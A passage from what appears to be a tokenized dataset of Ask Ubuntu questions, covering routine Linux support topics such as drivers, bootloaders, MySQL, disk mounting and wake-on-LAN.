brand-new 10.10 installation on a real partition . so , let 's start over : should i install the nvidia-glx-185 again , and then what ?
19459	which norton commander style filemanager do you recommend ?	i 'm searching for a good filemanager in style of the classic norton commander 2 panel design ? since i had my best experiences with total commander in windows , which one would you recommend for use in ubuntu ?
19469	why is my wi-fi still not working ?	i have 10.10 , and have gotten ndiswrapper and the proper driver , it installed properly , but still my wi-fi is n't working . in terminal it say its disabled , but its enabled everywhere ... even when i exited windows . right now i 'm left to use an ethernet cord and a second computer ... please help . my windows is n't in good condition and i would love to switch to ubuntu ... but wi-fi is definitely a need . fyi , i have a toshiba satellite a505d-s6958 with the realtek rtl819 [ somehting something something ] ... but i have the driver from their webisite ... i really just need to get my wifi to work
19470	no wine menu showing up in main menu	i have uninstalled wine and then reinstalled a few weeks later , now there is no wine menu in the main menu . i ca n't get to anything wine related . how do i reset the menu so wine shows up ?
19478	kernel compile error with iw_ndis.c	i have a hp pavilion dm3t with intel hd graphics running ubuntu 10.10 64 bit . i 'm trying to compile and install a patched kernel according to this , https : //launchpad.net/~kamalmostafa/+archive/linux-kamal-mjgbacklight so i downloaded the tarball from here ( linked to from the page above ) : http : //kernel.ubuntu.com/git ? p=kamal/ubuntu-maverick.git ; a=shortlog ; h=refs/heads/mjg-backlight i untar 'd it to a directory , entered the directory and did : make defconfig i 'm not sure if that 's what i should have done but it was successful , so i did : make which seemed to work fine until it gave these errors : ubuntu/ndiswrapper/iw_ndis.c:1966 : error : unknown field ‘num_private’ specified in initializer ubuntu/ndiswrapper/iw_ndis.c:1966 : warning : initialization makes pointer from integer without a cast ubuntu/ndiswrapper/iw_ndis.c:1967 : error : unknown field ‘num_private_args’ specified in initializer ubuntu/ndiswrapper/iw_ndis.c:1967 : warning : excess elements in struct initializer ubuntu/ndiswrapper/iw_ndis.c:1967 : warning : ( near initialization for ‘ndis_handler_def’ ) ubuntu/ndiswrapper/iw_ndis.c:1970 : error : unknown field ‘private’ specified in initializer ubuntu/ndiswrapper/iw_ndis.c:1970 : warning : initialization makes integer from pointer without a cast ubuntu/ndiswrapper/iw_ndis.c:1970 : error : initializer element is not computable at load time ubuntu/ndiswrapper/iw_ndis.c:1970 : error : ( near initialization for ‘ndis_handler_def.num_standard’ ) ubuntu/ndiswrapper/iw_ndis.c:1971 : error : unknown field ‘private_args’ specified in initializer ubuntu/ndiswrapper/iw_ndis.c:1971 : warning : initialization from incompatible pointer type make [ 2 ] : *** [ ubuntu/ndiswrapper/iw_ndis.o ] error 1 make [ 1 ] : *** [ ubuntu/ndiswrapper ] error 2 make : *** [ ubuntu ] error 2 how can i compile and install this kernel successfully ? i 'm new to this and would appreciate any help .
19479	what are some good gui binary viewers/editors ?	what are some gui applications that will let me view and edit binary files ( executables , images , etc . ) .
19483	installing/configuring mysql server nightmare	i 've never had problems installing and configuring mysql server in kubuntu but now it 's just being stubborn , here 's my issue : i installed the packages mysql-server , mysql-client ( both 5.1 ) , the server package asked me to put a root password , which i did , it then started saying `` access denied '' , on anything later on , i decided to purge the packages and re-install and gave a tweak to the my.cnf and not it says error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) please , is there a way to do a fresh start on this and do it right this time ? i do n't know if i 'm missing something but the /var/lib/mysql is not empty but there is no .pid , now the mysql service wo n't start , there is no mysql.sock either any help appreciated
19486	how do i add a kernel boot parameter ?	i need to add the boot parameter foo=bar to my kernel . how can i do this once for testing , and permanently if testing was a success ?
19492	is it possible to setup auto-detection of hdmi ?	right now when i plug my hdtv into my laptop 's hdmi input i have to run 'xrandr ' for it to recognize the display and then manually switch the audio hardware selection . is there a way that ubuntu can detect when the hdmi is plugged in and invoke a script that calls xrandr and switches the hardware and then does likewise when disconnected ?
19497	where did mercurial install to ?	i used sudo apt-get install mercurial to install hg.. where did it put the executable ? i need to specify the location in netbeans . is there a general way to find where apt-get installs things ? ( before the install would be nice , too . )
19500	problem detecting mic on sony vios pcg 7192l	ubuntu 9.10 problem detecting mic on sony vios pcg 7192l , pls help .
19502	my webcam stopped working , how do i fix it ?	i 'm using ubuntu on a new compaq presario cq56 . the webcam was working fine for the first two days , in both skype and cheese , but simply turned black with thin vertical lines in the middle of a skype call and now refuses to work in any program , including gstreamer-properties , cheese , and vlc . it gives a black screen when rebooted into a live cd and tested . when tested , it either shows a plain black screen or black with thin vertical lines . attached is an image of the video shown ( it is static , there is no noise or static , and no response to variance in light ) . also , when i play music or sounds , it makes a garbled noise related to the sound being played , which may or may not be connected to the webcam issue . if anyone has any ideas on what caused this , or whether it 's a hardware or software issue , or how to fix it , i would appreciate them very much , thanks
19503	text editor with coloring to highlight `` non-parameters '' in conf files ?	some .conf files have a lot of comments and parameters in them like so , # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no ... .. it gets difficult to look for only the parameters among the plethora of comments , so is there some text editor that can highlight the comments in dark grey so that the real parameters stand out ?
19504	reasonable size for `` filesystem reserved blocks '' for non-os disks ?	when creating a file system ( mkfs ... ) the file system reserves 5 % of the space for its own use because , according to man tune2fs : reserving some number of filesystem blocks for use by privileged processes is done to avoid filesystem fragmentation , and to allow system daemons , such as syslogd ( 8 ) , to continue to function correctly after non-privileged processes are prevented from writing to the filesystem . but with large drives 5 % is quite a lot of space . i have 4x1.5 tb drives for data storage ( the os runs on a separate disk ) , so the default setting would reserve 300 gb , which is an order of magnitude more than the the entire os drive . the reserved space can be tweaked , but what is a reasonable size for a data disk ? can i set it to zero , or could that lead to issues with fragmentation ?
19509	error while loading mongodb	when i put mongo command on terminal it gives me error like mongo : error while loading shared libraries : libmozjs.so : can not open shared object file : no such file or directory
19510	in the output of 'ls -n ' , what does the the second column mean ?	when i run : ls -n i get something like : -rwxrwxrwx 1 1000 1000 765528 2009-10-15 18:41 file1 drwxr-xr-x 10 1000 1000 4096 2010-12-07 20:50 dir1 drwxr-xr-x 3 1000 1000 4096 2010-10-24 16:57 dir2 what does the second column ( the number ) mean ?
19518	best log file monitoring tool for ubuntu server	i 'm trying to find the best log file monitoring tool for ubuntu 9.10 server ? is there any web-based gui tool which could be operated by anyone , that monitor any log files ? i already tried splunk and felt it 's a bit hard to operate and it 's not a completely free tool
19520	how to format fat32 filesystem infected with windows virus and that is write protected	i have a pendrive with fat32 filesystem . it is infected with virus dont know which but has autorun.inf and create exe file within folder . i tried to format it with various filesystems and even try to delete it with gparted but could n't because it says it is write protected i ca n't even delete files . how to format it ? user @ explorerx : ~ $ sudo fdisk -l disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xbd04bd04 device boot start end blocks id system /dev/sda1 * 1 498 3998720 82 linux swap / solaris partition 1 does not end on cylinder boundary . /dev/sda2 499 19457 152287585+ f w95 ext 'd ( lba ) /dev/sda5 5100 10198 40957686 7 hpfs/ntfs /dev/sda6 10199 14787 36861111 7 hpfs/ntfs /dev/sda7 14788 19457 37511743+ 7 hpfs/ntfs /dev/sda8 499 5099 36956160 83 linux partition table entries are not in disk order disk /dev/sdc : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc13bc13b device boot start end blocks id system /dev/sdc1 1 9729 78143488 7 hpfs/ntfs /dev/sdc2 9729 19457 78143488 7 hpfs/ntfs disk /dev/sdb : 4194 mb , 4194304000 bytes 112 heads , 47 sectors/track , 1556 cylinders units = cylinders of 5264 * 512 = 2695168 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 2 1557 4091904 b w95 fat32 updates to karthick87 user @ explorerx : ~ $ sudo fdisk /dev/sdb warning : dos-compatible mode is deprecated . it 's strongly recommended to switch off the mode ( command 'c ' ) and change display units to sectors ( command 'u ' ) . command ( m for help ) : d selected partition 1 command ( m for help ) : w the partition table has been altered ! calling ioctl ( ) to re-read partition table . warning : re-reading the partition table failed with error 16 : device or resource busy . the kernel still uses the old table . the new table will be used at the next reboot or after you run partprobe ( 8 ) or kpartx ( 8 ) e
19529	how to read nero incd cd-rw disks ?	i have many cd-rw disks with photos that i want to archive on an external hd , but i can not read them with ubuntu . how can i read these disks ? incd allows you to use your rewritable disc like a big floppy disk . copy files onto your disc using drag and drop or save them to the disc from other applications .
19538	how do you diagnose constant crashing issues ?	my recent installation 10.10 on my laptop keeps freezing/crashing on start-up after working perfectly for one day . the system just freezes , like a screnshot , and a restart is required . it happens directly after login or just as any application is selected . nothing new has been installed . i have just moved from xp so i would be very grateful if some one could please explain to me , as simply as possible , how to do the following ... how to diagnose the problem so it can be fixed , remember it may have to be before the log in . all help is greatly appreciated .
19540	default location of web site content	i am looking to install mediawiki on a production server ( after doing a test on a development one ) . i could not really understand why the default location for the mediawiki files is /var/lib/mediawiki . i would have thought /var/www would 've made more sense . i did some research and in ubuntu policy manual , chapter 11 - customized programs , 11.5 web servers and applications it says the following . web document root web applications should try to avoid storing files in the web document root . instead > they should use the /usr/share/doc/package directory for documents and register the web > application via the doc-base package . if access to the web document root is unavoidable > then use /var/www why is this ?
19546	dual monitors and command line	i set up gnome to use 2 monitors in extended mode - and it works great as expected . now i 'm wondering wether it is possible to use this setup in the console mode . currently i see the same command line window on both monitors ( clone view )
19549	will a system restore fix constant crashing/freezing issues ?	my recent installation 10.10 on my laptop keeps freezing/crashing on start-up after working perfectly for one day . the system just freezes , like a screenshot , and a restart is required . it happens directly after login or just as any application is selected . nothing new has been installed . i have just moved from xp . will a system restore fix this like in windows ? like i said , nothing new has been installed . help is greatly appreciated
19555	how can i play a dvd-a ( dvd-audio ) disc ?	i am able to play such a disc using vlc , but i am wondering if any music player supports the dvd-a format . links : dvd-audio - wikipedia idea # 22415 : please add full support for dvd-audio and lpcm - ubuntu brainstorm example dvd-a releases : porcupine tree - fear of a blank planet steven wilson - insurgentes king crimson - in the court of the crimson king ( 40th anniversary edition ) update : i checked rhythmbox and banshee - i found no option like play disc or open disc , so i have no idea how i could even try to start playing a dvd-a disc . this has also nothing to do with missing plug-ins or codecs - the packages gstreamer0.10-plugins-ugly , gstreamer0.10-plugins-bad and ubuntu-restricted-extras were installed on my machine before . i guess i am stuck with vlc ( totem shows a dvd menu , but then hangs ) . however , i am missing the regular music player experience - ability to change order of tracks , adding tracks to a playlist , listening only to selected tracks , etc .
19556	how can i use the windows ( super ) key ?	the windows key seems to not have any use in ubuntu , but since i 'm just coming from windows i 'm used to this key having some function . how can i make good use of the windows key in ubuntu ? i 've seen that i can remap keys in system > preferences > keyboard > layout > options > alt/super key behavior , but i have no idea what the choices meta , super , hyper mean . the help button in this dialog does n't give any specifics about them . i 've experimented a little and found that meta seems to have some use , like super+m = me menu , or super+s is the shutdown menu , but for some keys ( b , i ) it 's more like ctrl ( bold , italic ) . have n't found any further . what would a useful setting be for a linux newbie ?
19558	what are the meta , super , and hyper keys ?	in system - > preferences - > keyboard - > layout - > options - > alt/win key behavior what do meta , super , hyper mean ?
19559	how can i connect my hp photosmart c3100 printer in 10.04 ( regression from 9.x )	my printer was working under 9.x . it is a an hp photosmart c3100 series . when i open admin- > printing no local printers are found . i try to add via other ( my local choices are serial and other ) . i have tried many url 's - ipp : //localhost:631/ipp , http : //localhost/ipp , localhost , 127.0.0.1 , etc ... none have worked . under the networked i have tried jetdirect , using localhost and 127.0.0.1 and port 631 . i have tried many options under ipp with different variants in the host trying to verify a printer . no luck .i tried lpd/lpr with localhost and tried the probe . no luck . i tried the cups admin via localhost:631 and that did n't work . on the old version its simply found the local printer , i might have picked the driver , i ca n't remember but it was the photosmart c3100 series that was working.i just ca n't get 10.04 to print .
19560	grub2 panic : `` no such partition ''	i managed to install 10.04 on a system that already has 8.04 ( separate partitions , of course ) . it also installed grub2 onto the mbr . after discovering that there is no menu.lst anymore , i edited /etc/grub.d/40_custom to point to where my other os partitions are : menuentry `` ubuntu 8.04 '' { set root= ( hd0,0 ) linux /boot/vmlinuz-2.6.24-28-generic initrd /boot/initrd.img-2.6.24-28-generic } menuentry `` windows 7 ultimate 64-bit '' { set root= ( hd0,2 ) chainloader ( hd0,2 ) +1 } grub2 displays the menu with those entries but when i select any of them , it refuses to load them , saying `` no such partition '' . i know the partitions are there , as 10.04 's `` disk utility '' sees them without any problem . how do i get grub2 to recognize them ?
19561	moonlight stopped working on tvp.pl	i 'm watching the bold and the beautiful on the site : http : //www.tvp.pl/seriale/obyczajowe/moda-na-sukces/wideo yesterday i wanted to view next episode , however it did n't work . i checked various episodes from other points in time and none works . the `` dots '' that appear when a silverlight video is loading are present , but after them there is only black screen ( of death ) . i 'm using ubuntu lucid lynx 32 bit with gnome2 and firefox 3.6 . i have all updates done . could somebody check if any video is working for them and tell me their setup , please ? i 'm using moonlight 3 . two days ago everything was fine but later this problem appeared .
19562	is there a virus scanner for scanning windows files ?	i use ubuntu as a file server , is there a virus scanner on ubuntu for scanning windows files ? since most of the files are saved on the server , this greatly help minimize the spread of viruses . thanks !
19569	how can i assign actions to all my mouse buttons ?	i have a mouse with lots of buttons , but it 's not a mainstream make like logitech . for windows , i have a driver that lets me assign actions like close-window ( ctrl+w ) or next-tab ( ctrl+tab ) , but i do n't have a linux driver . since linux is so flexible , i thought perhaps there is a general way to do this , regardless of brand ? update : based on input from cyrex , i installed and ran sudo apt-get install btnx which found several but not all mouse buttons . found : left , right , wheel , wheelclick , thumb fwd , thumb back . not found : wheel left , wheel right , thumb middle button . vendor id is 0x04d9 , model id is 0xa015 . update 2 : in system > prefs > mouse there 's a lightbulb icon for testing double-click speed . every working button can turn the bulb on & off , but the missing buttons ca n't . it would seem that ubuntu is n't aware of these buttons and thus does n't register their clicks . i guess i need to hunt for a driver , though a mainstream mouse is probably the easier way .
19573	is unity a desktop environment ?	i read somewere that unity is a de , is that true or not ?
19578	how to access files on a drive from an older system , mounted in a new system ?	i 've recently built a new system , after a rather large physical injury was sustained by my previous system ( a precarious balance , and gravity , were not a happy mix ) . surprisingly the /home drive of that system appears to have more-or-less survived the trauma . however ... i decided to use a fresh drive for / ( and swap ) partition ( s ) , and another fresh drive for the new /home . now that 's working , i decided to install the old /home drive ( that i had assumed until now would be entirely dead and without capacity for use ) into the new system to recover the files and data ( so far as is possible ) . at this point i 've run into a snag : i have no idea how to go about this ( with windows it was relatively easy , the new drive would be the latest character of the alphabet , and go from there ) . with 'disk utility ' ( system - > administration - > disk utitlity ) i 've worked out which drive it is ( /dev/sda ) but clicking on 'mount ' produces an error : 1 : helper failed with : mount : according to mtab , /dev/sdb1 is already mounted on / mount failed ... if it is mounted on / i ca n't see it . i 'm also moderately confused by the disk ( device /dev/sda ) being referred to as /dev/sdb1 . any and all insights would be incredibly welcome ( i 've already voted for : idea # 9063 : new internal hard drives default automount at brainstorm ) . edited in response to roland 's request for a screenshot of disk utility : details ( so far as i know them ) : 40gb disk is / and swap , 1.0 tb samsung is /home 1.0 tb hitachi is from the old system ( and was the old /home drive ) . output from sudo fdisk -l pasted below : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000bef00 device boot start end blocks id system /dev/sda1 1 121601 976760001 83 linux disk /dev/sdb : 40.0 gb , 40018599936 bytes 255 heads , 63 sectors/track , 4865 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00037652 device boot start end blocks id system /dev/sdb1 * 1 4742 38084608 83 linux /dev/sdb2 4742 4866 993281 5 extended /dev/sdb5 4742 4866 993280 82 linux swap / solaris disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000e8d46 device boot start end blocks id system /dev/sdc1 1 121602 976760832 83 linux edited in response to @ danny staple 's answer : i ran the following : udo mkdir /mnt/oldhome sudo mount -t ext3 /dev/sda1 /mnt/oldhome the first part works as expected , and creates the directory , the second part runs for some time and errors out with the following : mount : wrong fs type , bad option , bad superblock on /dev/sda1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so i must confess that i 'm beginning to believe that the smart report , that suggests the disk is healthy with a 'few ' bad sectors , may be a little inaccurate . edited , as requested by @ danny staple ( below ) , with the output from dmesg | tail : david @ morpheus : ~ $ dmesg | tail [ 192.008425 ] 72 03 11 04 00 00 00 0c 00 0a 80 00 00 00 00 00 [ 192.008444 ] 3a 34 18 97 [ 192.008452 ] sd 0:0:0:0 : [ sda ] add . sense : unrecovered read error - auto reallocate failed [ 192.008464 ] sd 0:0:0:0 : [ sda ] cdb : read ( 10 ) : 28 00 3a 34 18 97 00 01 00 00 [ 192.008482 ] end_request : i/o error , dev sda , sector 976492695 [ 192.008511 ] jbd : failed to read block at offset 264 [ 192.008529 ] jbd : recovery failed [ 192.008536 ] ext3-fs ( sda1 ) : [ 192.008541 ] ata1 : eh complete [ 192.008547 ] error loading journal final edit : it 's my sad duty to share the news of the untimely death of one 1.0 tb hitachi hard drive , due , i 'm assuming from the heart-stopping clicks in its last moments of life , mechanical damage sustained in a fall . it , and its many contents , will be sorely missed . unfortunately the data was not recoverable by any of the suggestions raised in this question , which leaves me in a slightly awkward position : i do n't want to have a non-answered question , so i 'll side with the community votes and accept @ danny staple 's answer , since it seemed the most promising suggestion ( and , again , was the most community-rewarded answer ) , but i will note for late-comers in future that this question was not ( really ) resolved , so the solution offered by @ danny may , or may not , work for others . thank you all for your help , and suggestions .
19581	how to access mysql on windows from ubuntu ?	is it possible to have the actual mysql database installed on windows and access it from ubuntu 10.10 on the local network ? i think i need a mysql `` client '' ? so i looked here ( mysql linux0generic ) , but i do n't know what to download.. ps . i tried looking for documentation on the mysql site but i ca n't see a single link for any type of documentation ...
19587	asus netbook : should cpuid speed limit should be enabled	i would like to know if it 's better to enable the bios cpuid speed limit on a netbook or leave it disabled ? is it setting the optimal cpu speed ? thanks for your help
19589	how to list windows shares from terminal ?	here is a simple scenario i have : windows 7 is sharing a folder ( d : \projects ) . full control permissions have been given to the folder . in ubuntu 10.10 , i can see the windows shares from places - > network menu . i can create a folder in the shared projects folder from nautilus how do i ls those same folders ( displayed in nautilus ) from the terminal ? ( mount and ls /mnt do not list those windows shares ) ps . details on what i am doing : using ubuntu as a `` headless '' vm using virtualbox . accessing ubuntu via putty ability to give complete access to the ubuntu vm for the windows shared folder
19590	how do i share nfs mounts over zeroconf ?	i would like to advertise my nfs shares via avahi so that i can just browse from multiple machines without having to set it all up , especially when guests come over and i want something automagic . i am aware most clients will need extra packages ( like nfs-common ) installed for it to work . the ideal solution will include instructions for clients as well ( if any ) .
19593	how do i make my volume indicator operate in decibels instead of percentage ?	when i want to adjust the volume of anything i 'm doing , i find that using the volume controls built into ubuntu is little but confusion . when the volume is around 100 % , dropping it several increments has almost no effect on apparent volume , but when it 's around 0 % , the effect of one click of my mouse wheel is probably a good 3 decibels . i have observed this behavior on tens of different uc 's , since i convert about one ubuntu user a month ( ne team contact ) . this has proven so frustrating to me that i tend to use the volume knob on my guitar amp ( mono audio : | ) instead of the volume indicator . what can i do to make my volume indicator behave properly until this is fixed ? i want each volume increment to be one half or one third decibel . is there a different piece of software i should use for system volume configuration perhaps ?
19597	ubuntu 10.10 not normal boot screen	hi everyone , i have installed the latest ati drivers from amd 's website and everything 's working fine . it 's just that with these drivers i get a very simple looking boot screen . it 's just a purple screen with `` ubuntu 10.10 '' written in the center and 3 dots below it . is there anyway i can get the default boot screen that everyone see 's in ubuntu 10.10 thanks
19598	`` page size '' and `` orientation '' are disabled when printing from some applications	there are many different print dialogs but one is very common and is used by gimp , shutter , evloution and simple scan . in all these apps the `` page size '' and `` orientation '' are disabled . the same dialog in firefox , thunderbird and gedit works ok . i program in gambas3 which uses this dialog in conjunction with the gtk+ library and it also has these options disabled . if i use the qt4 library then a different print dialog is displayed with no problems . anybody else notice this problem and found a solution ?
19600	what 's the best filesystem to share between os x and ubuntu ?	got a macbook air 3,1 11 '' w/ 128gb ssd . configuring for dual boot . i intend to have a shared drive where i 'll store my media . what filesystem is best ? they say fat32 is best for cross-platform compatibility , but the maximum size for file transfer is 4gb , which could be an issue for my media transfer . what 's the best filesystem to share between os x and ubuntu ?
19603	log out in kubuntu puts me to a black srceen	i have installed kubuntu 10.10. when i click leave- > logout the system turns into a black screen just like a dos screen rather than a graphical screen . once there keyboard does not work . i have logged out but i have no idea how to login . i have to press the power button to turn the pc off and start again . why on earth is this happening ?
19604	i need a boot screen	i need a boot screen even win95 had it all i see is a black screen and its not nice for ubuntu 10.10 to have a black screen.i m using 1366*768 and nvidia 253 .
19605	differences between grub , grub2 and burg	i know grub , grub2 and burg are boot loaders . what is the differences between the three ?
19607	how to enable opengl 2.0 and webgl on gma 3150 ?	i have a dell mini 1012 which has an intel n450 processor and gma 3150 integrated graphics card running ubuntu 10.10 . according to intel 's website the graphics card supports opengl 2.0. http : //software.intel.com/en-us/articles/quick-reference-guide-to-intel-integrated-graphics/ # 9 but when i type glxinfo in terminal the opengl version string gives me the following opengl version string : 1.4 mesa 7.9-devel i have installed the latest drivers but it did n't work . so , how can i enable opengl 2.0 on this card ?
19610	how do i get a sb x-fi xtreme audio driver to support microphone ?	the microphone is not working on ubuntu , i checked alsa mixer and i do n't seem to have any channel muted . i believe its a driver issue , since i already faced a lot of problems regarding driver support for this audio card . its ubuntu 10.04 lts 64-bit , and the kernal is linux 2.6.32-27-generic thanks for help .
19611	access ntfs partitions without providing root password ?	i have ubuntu and windows vista installed on the same disk , different partitions . i can access the windows data , but each ( first ) time i access the ntfs partition , the system asks me for root password . can i somehow allow my user to mount/access those partitions automatically ?
19613	how can i do individual file encryption on dropbox ?	i 'd like to set a single directory inside dropbox in which files are encrypted on a file-by-file basis . at the moment , i use a 2mb truecrypt container inside my dropbox which i then have to mount manually , access/change the files within , then unmount manually . at that point , the entire 2mb uploads to dropbox . this is a pain for a number of reasons : dropbox sync will only occur when the truecrypt container is unmounted , because dropbox only syncs files that are n't locked and mounting a container locks it . a single byte change to one file inside that container results in the whole 2mb being uploaded again . it does n't scale - i was originally using a 10mb container , but obviously the bigger the container , the longer it takes to sync when it 's unmounted . i was wondering if i can somehow use luks to implement file-by-file encryption to get round the `` container '' issues .
19615	how to access photos from my genius g-shot p7545 camera ?	i have a genius g-shot p7545 camera . in windows i had just to plug in the camera to the usb and acces it like a usb stick . i tried to do that in ubuntu 10.10 with no result . how can i acces the photots ? with these comands i get : lsusb bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 015 : id 0784:1692 vivitar , inc . bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub sudo fdisk -l disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xcf5acf5a device boot start end blocks id system /dev/sda1 * 1 2550 20478976 83 linux /dev/sda3 2550 19458 135810048 f w95 ext 'd ( lba ) /dev/sda5 2550 19458 135809024 83 linux unable to read /dev/sdb
19618	touchpad does not work in lenovo 4152	i have installed ubuntu 10.10 in lenovo 4152 ... after the installtion the touch pad doesnot work ... i am not able to find any drivers for this . can anyone please suggest how to get the driver working..thanks
19620	ubuntu one , compressed files	i have uploaded some files to my ubuntu one account and it seems to work great most of the time . i usually upload them directly from nautilus by right clicking the folder , using the ”synchronize this folder” option , and then i make sure that the file i want to upload is published . then i usually test the whole thing by trying to download it . i right click the file again to get its url and i paste it into my web browser . this usually works fine . but yesterday i uploaded two compressed files – ”.tar.bz2” . when i tried to open them after downloading them with my web browser ( opera ) , it failed . i found that the file was bigger than the original file ( 2358 b instead af 2335 b – 15 b added at the beginning of the file and 8 b added to the end ) , and someone at the opera channel ( irc ) at operanet ( europe ) figured out that the reason for this is that the server compress the file again , ”without telling opera” . so to be able to extract the file i need to add ”.gz” to the file name and then extract it twice . if i downloaded it with firefox however , i did n't need to do that , so maybe firefox figured this out somehow in a way that opera does not . someone also tried to download the file with wget and some other browser and he also got the same result as i did with opera , that is the file is compressed a second time by the server . i guess ”the server” is the ubuntu one server , right ? so why is this ? could it be done better somehow ? or did i do something wrong when uploading the files ? it also seems like this extra compressing thing does not always happen , because when i tried again a few minutes ago , the file came down with its right size ( 2335 b ) , without an extra compression . but the other file ( 114 mib ) was still compressed twice .
19621	good php editor	i have seen through other questions on the topic but most are a bit old . i looking for a good editor for developing on php in linux ( ubuntu ) . here is my requirements basic editor features free light-weight syntax highlighting code folding ( class , function , if/else/while/foreach block ) code completion invalid syntax/error highlighting as you type auto code intending snippet support ( pieces of custom or language specific codes that i can insert ) extendable support it would be great if it had the following debugging support wysiwyg code formatting framework support ( cakephp/yii/zend/smarty ) testing support todo native look and feel ( gnome ) flex/ror support is welcome but not a requirement mysql support i have tried the following editors netbeans - it bloated , resource hogging and doesnt not have a native look and feel . eclipse is okay but i cant fold if/while blocks and slow . gedit can be extended and i have tried it but still i could not fold code or show error . i currently use geany but it does n't inform me of syntax errors as i type . if you have ways to solve the problems with above editors they too are also welcome
19623	split large file , have arbitrary start index number	i do a lot of file manipulation on my system and in one particular batch job i end up with around 16 gb file . i need to prepare this data into smaller chunks for another process . i split it into 10k lines per file and numeric index , padded to 5 digits split -a 5 -d -l 10000 large_input_file /out_path/out . this way i end up with files named out.00000 out.00001 ... the problem is that this way indexing always starts with 0 . is there a way to set it to arbitrary starting index ? man reveals nothing ...
19626	using gwibber as `` desktop background '' ?	is there any way to set an application , in this case gwibber , in the background of the desktop ? this means basically having it in the background showing tweets and if i do n't click it , like , i do n't know , twice , then i 'm not `` interacting '' with it and it is not enabled . if the question is not clear comment it and i will correct what 's unclear .
19627	installing apc on lighttpd + php 5.2	i 've found this tutorial to install apc on servers with lighttpd + php 5.2 on ubuntu 10 . however , when i run sudo pecl install apc the package is just downloaded and is not installed . ( i.e . i 'm not asked the next question '' and apc.ini file is not created at all . if i run only pecl install apc i get a warning ( no permissions to write some files ) . ( i need instructions for both 9.04 and 10.04 ) thanks
19629	how to install correctly another linux flavour ( in my case pclinuxos ) together with installed ubuntu ?	hello everybody and prosperous and productive year 2011 ! ! ! i have ubuntu 10.10 ( 32bit ) installed on my laptop . i would like to install pclinuxos ( kde or lxde version , i do n't know yet ) on the same computer across with ubuntu 10.10 . i would like to test 'in real conditions ' a new pclinuxos as well as to resolve my question regarding audio cd playback issue ( mounting dbus timeout error ) . i would be grateful if somebody can advise me how to perform the installation of another linux flavour without breakdown : ) of existing ubuntu system ? thank you in advance for advices and recommendations . here is my current partitioning :
19633	wakeonlan from remote host	i have setup wake on lan service on my server . everything works fine on local area network : root @ server $ : poweroff user @ local $ wakeonlan aa : bb : cc : dd : ee : ff and the server wakes up . aa : bb : cc : dd : ee : ff is a mac address of my server , which has ip 192.168.1.2 and hostname : example.com . it is connected to the router , which has ip 192.168.1.1 ( public : xxx.xxx.xxx.xxx ) when the server is up , i can ping : ping example.com or login via ssh : ssh user @ example.com so far , so good . now i 'm able to wake the server up from local area , but how to wake the server from the remote location ? i tried : user @ local $ wakeonlan -i xxx.xxx.xxx.xxx aa : bb : cc : dd : ee : ff , but it does not work ( nothing happens ; ) . do i have to configure my router somehow to forward magic packets ? how ? the solution after ragnar 's answer the solution looked very easy . but actually , it was a bit tricky . my router is linksys wag200g , which does not support wake on lan by default . furthermore , it does not allow to forward to triplets above 254 ( my broadcast address was 192.168.1.255 ) . the solution was to forward udp port 7 to the address of the server , which was 192.169.1.2 , then call : wakeonlan -i example.com -p 7 aa : bb : cc : dd : ee : ff also i installed new firmware : openwag200 which is a great router options upgrade ( e.g . adds wake on lan option ) . i also changed my netmask from 255.255.255.0 to 255.255.255.128 , so my broadcast is now 192.168.1.127 and passes the router validation rules . here is the script i use to connect to the machine , and wake it up if needed : # ! /bin/bash # # this sends magic packets to wake on lan # # please note , you must formard port 7 to the target machine on your router # # host to wake up host= '' example.com '' # # mac address of the machive to wake up mac= '' aa : bb : cc : dd : ee : ff '' # # user to login user= '' administrator '' echo `` looking for $ host ... '' wget -q -- tries=2 -- wait=1 -- waitretry=5 http : // $ host/ if [ $ ? -ne 0 ] ; then echo `` $ host is not available . '' echo `` waking up $ host . '' wakeonlan -p 7 -i $ host $ mac echo `` $ host is booting up . please wait ... '' sleep 30 wget -q -- waitretry=5 -- wait=5 http : // $ host/ echo ^g echo $ host is up ! lucky you ! fi ssh `` $ user @ $ host '' do n't forget to install : wakeonlan
